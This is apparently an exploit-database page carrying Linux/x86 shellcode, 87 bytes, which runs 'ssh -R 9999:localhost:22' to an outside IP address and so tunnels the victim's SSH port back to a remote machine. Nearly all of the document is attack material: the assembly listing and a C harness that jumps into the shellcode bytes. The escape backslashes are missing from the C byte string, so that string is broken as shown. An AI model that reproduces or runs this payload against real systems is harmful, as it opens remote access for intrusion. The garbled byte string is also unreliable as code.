Linux/x86 Remote Port Forwarding Shellcode 87 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux/x86 Remote Port Forwarding Shellcode 87 bytes
# Published : 2012-12-24
# Author :
# Previous Title : BSD x86 connect back Shellcode (81 bytes)
# Next Title : w32-speaking-shellcode

*****************************************************
* Linux/x86 Remote Port forwarding 87 bytes         *
* ssh -R 9999:localhost:22 192.168.0.226            *
*****************************************************
* Author: Hamza Megahed                             *
*****************************************************
* Twitter: @Hamza_Mega                              *
*****************************************************
* blog: hamza-mega[dot]blogspot[dot]com             *
*****************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com        *
*****************************************************

xor    %eax,%eax
push   %eax
pushl  $0x3632322e
pushl  $0x30302e38
pushl  $0x36312e32
pushw  $0x3931
movl   %esp,%esi
push   %eax
push   $0x32323a74
push   $0x736f686c
push   $0x61636f6c
push   $0x3a393939
pushw  $0x3930
movl   %esp,%ebp
push   %eax
pushw  $0x522d
movl   %esp,%edi
push   %eax
push   $0x6873732f
push   $0x6e69622f
push   $0x7273752f
movl   %esp,%ebx
push   %eax
push   %esi
push   %ebp
push   %edi
push   %ebx
movl   %esp,%ecx
mov    $0xb,%al
int    $0x80

********************************
#include <stdio.h>
#include <string.h>
 
char *shellcode = 
"x31xc0x50x68x2ex32x32x36x68x38x2ex30x30x68x32x2ex31x36"
"x66x68x31x39x89xe6x50x68x74x3ax32x32x68x6cx68x6fx73x68"
"x6cx6fx63x61x68x39x39x39x3ax66x68x30x39x89xe5x50x66x68"
"x2dx52x89xe7x50x68x2fx73x73x68x68x2fx62x69x6ex68x2fx75"
"x73x72x89xe3x50x56x55x57x53x89xe1xb0x0bxcdx80";



 
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}